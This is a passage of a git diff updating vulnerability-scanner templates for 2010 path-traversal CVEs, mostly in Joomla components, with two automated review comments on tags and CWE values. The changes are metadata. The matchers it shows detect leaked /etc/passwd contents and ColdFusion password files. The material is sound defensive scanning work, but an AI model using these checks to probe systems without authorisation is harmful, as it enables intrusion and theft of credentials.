@@ -9,15 +9,20 @@ info: - https://www.exploit-db.com/exploits/12595 - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2045 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01671 + cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dionesoft + product: com_dioneformwizard + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 6ec6a99e60..70bf23e240 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/12611 - https://nvd.nist.gov/vuln/detail/CVE-2010-2050 - - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt + - http://www.vupen.com/english/advisories/2010/1159 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2050 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.03527 + cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 + vendor: m0r0n + product: com_mscomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" 
diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 0ac90af4df..8034b4f47b 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2122 info: name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://nvd.nist.gov/vuln/detail/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192 + - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2122 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01806 + cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joelrowley + product: com_simpledownload + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 6bf86733f6..385ffa3864 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml 
@@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/12607 - https://nvd.nist.gov/vuln/detail/CVE-2010-2128 - - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/ - http://www.exploit-db.com/exploits/12607 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2128 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jequoteform + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index b42c644237..9edc715cde 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/10946 - https://nvd.nist.gov/vuln/detail/CVE-2010-2259 - - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/ - http://www.exploit-db.com/exploits/10946 + - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2259 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01671 + cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tamlyncreative + product: com_bfsurvey_profree + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" 
diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index a604f1db68..6a9e361b0e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -3,22 +3,26 @@ id: CVE-2010-2307 info: name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. reference: - - http://web.archive.org/web/20210120195654/https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://www.exploit-db.com/exploits/12865 - http://www.exploit-db.com/exploits/12865 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113 remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - tags: cve2010,iot,lfi,motorola,edb,cve + epss-score: 0.00832 + cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: motorola + product: surfboard_sbv6120e + tags: cve2010,iot,lfi,motorola,edb,cve http: - method: GET diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index d9aa1e6b52..6f99dcfd7e 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml 
@@ -3,22 +3,26 @@ id: CVE-2010-2507 info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/13981 - https://nvd.nist.gov/vuln/detail/CVE-2010-2507 - - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/ - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2507 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.01671 + cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: masselink + product: com_picasa2gallery + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index becf360652..28ffb28449 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml 
@@ -3,22 +3,26 @@ id: CVE-2010-2680 info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/14064 - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jesectionfinder + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 6bfe799c9f..2b194116fe 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml 
@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2682 - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - http://www.exploit-db.com/exploits/14017 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2682 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: realtyna + product: com_realtyna + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index a51e09c9fc..1b13e60007 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml 
@@ -3,22 +3,26 @@ id: CVE-2010-2857 info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. reference: - https://www.exploit-db.com/exploits/14274 - https://nvd.nist.gov/vuln/detail/CVE-2010-2857 - - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/ - http://www.exploit-db.com/exploits/14274 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2857 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00826 + cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: danieljamesscott + product: com_music + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 14a3259e9b..524e62f948 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml 
@@ -9,15 +9,21 @@ info: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - http://securityreason.com/securityalert/8148 + - http://securityreason.com/securityalert/8137 + - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 + epss-score: 0.97295 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" + vendor: adobe + product: coldfusion tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi http: @@ -27,12 +33,11 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "rdspassword=" - "encrypted=" - part: body condition: and - type: status diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index d3bc05a979..89eabf26a0 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/31708 - https://nvd.nist.gov/vuln/detail/CVE-2010-2918 - - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - https://www.exploit-db.com/exploits/14476 + - http://www.vupen.com/english/advisories/2010/1925 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2918 cwe-id: CWE-94 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.02847 + cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: visocrea + product: com_joomla_visites + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET 
@@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 0caf40d12b..82f82298e8 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -3,21 +3,26 @@ id: CVE-2010-2920 info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.03527 + cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_foobla_suggestions + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 80114ae6c5..5680273239 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-3203 info: name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. reference: - https://www.exploit-db.com/exploits/14845 @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00626 + cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xmlswf + product: com_picsell + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index be59db13bf..7b0ebdf427 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-3426 - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - http://www.exploit-db.com/exploits/14964 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-3426 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 + vendor: 4you-studio + product: com_jphone + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" 
diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 49f5c3e5e2..e7f66b9469 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2010,iot,lfi,camera,edb + epss-score: 0.00822 + cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: camtron + product: cmnc-200_firmware + tags: cve,cve2010,iot,lfi,camera,edb http: - method: GET diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index f9438ef1e2..284370fe61 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* - epss-score: 0.00641 - tags: cve,cve2010,tikiwiki,lfi + epss-score: 0.01809 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: cve,cve2010,tikiwiki,lfi http: - method: GET diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index e946cde516..171ea60864 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml 
@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 + - http://seclists.org/fulldisclosure/2010/Nov/326 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2010,lfi,joomla + epss-score: 0.01214 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 0b88236096..4b5f13491a 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml 
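Review bot: The rewritten tags line `tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla` keeps `joomla` and `phpshowtime` on a template whose new CPE and `product: pandora_fms` say this is a Pandora FMS check, so a `-tags joomla` run will select it and a run filtered on the Pandora FMS tag will miss it. The commit touches exactly this line to add `seclists`, so it is the right moment to drop the two stale tags and replace them with whatever tag the repository already uses for Pandora FMS templates. The matchers hunk further down is unaffected.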
@@ -3,21 +3,26 @@ id: CVE-2010-4617 info: name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/15791 - https://nvd.nist.gov/vuln/detail/CVE-2010-4617 - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-4617 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00938 + cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kanich + product: com_jotloader + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index ecd2242147..037daf0dce 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml 
@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4719 - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - http://www.exploit-db.com/exploits/15749 + - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4719 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fxwebdesign + product: com_jradio + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index f00094c66b..6d78595c9b 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00949 + cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: janguo + product: com_jimtawl + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 58767bdbe9..87e7ffc844 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml 
@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4977 - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt + - http://securityreason.com/securityalert/8495 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.00239 + cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: miniwork + product: com_canteen + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index f57dd08a28..3c600f288a 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -9,16 +9,20 @@ info: - https://www.exploit-db.com/exploits/12601 - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01171 + cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jejob + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 0b0082cad2..e3bacfe9cb 100644 
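Review bot: `cwe-id: CWE-89` on CVE-2010-4977 sits next to an `lfi` tag and, in the matchers hunk below, a `root:.*:0:0:` regex, so the recorded weakness class is SQL injection while the template itself performs a path-traversal read; CVE-2010-5028 in the same line has the same combination. The value may simply mirror NVD (the packetstorm reference name suggests the advisory covered both an LFI and an SQLi), but anyone grouping results by `cwe-id` will file two traversal checks under injection. If NVD is the source of truth, a comment above the key such as `# cwe-id follows NVD; this template exercises the path-traversal part of the advisory` would stop the next reader from changing it; otherwise `cwe-id: CWE-22` matches the tags and the matcher.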
--- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -3,21 +3,26 @@ id: CVE-2010-5278 info: name: MODx manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. reference: - https://www.exploit-db.com/exploits/34788 - https://nvd.nist.gov/vuln/detail/CVE-2010-5278 - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt - - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/ + - http://modxcms.com/forums/index.php/topic,55104.0.html + - http://modxcms.com/forums/index.php/topic,55105.msg317273.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - tags: cve,cve2010,lfi,edb,packetstorm + epss-score: 0.0469 + cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: modx + product: modx_revolution + tags: cve,cve2010,lfi,edb,packetstorm http: - method: GET @@ -26,13 +31,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word 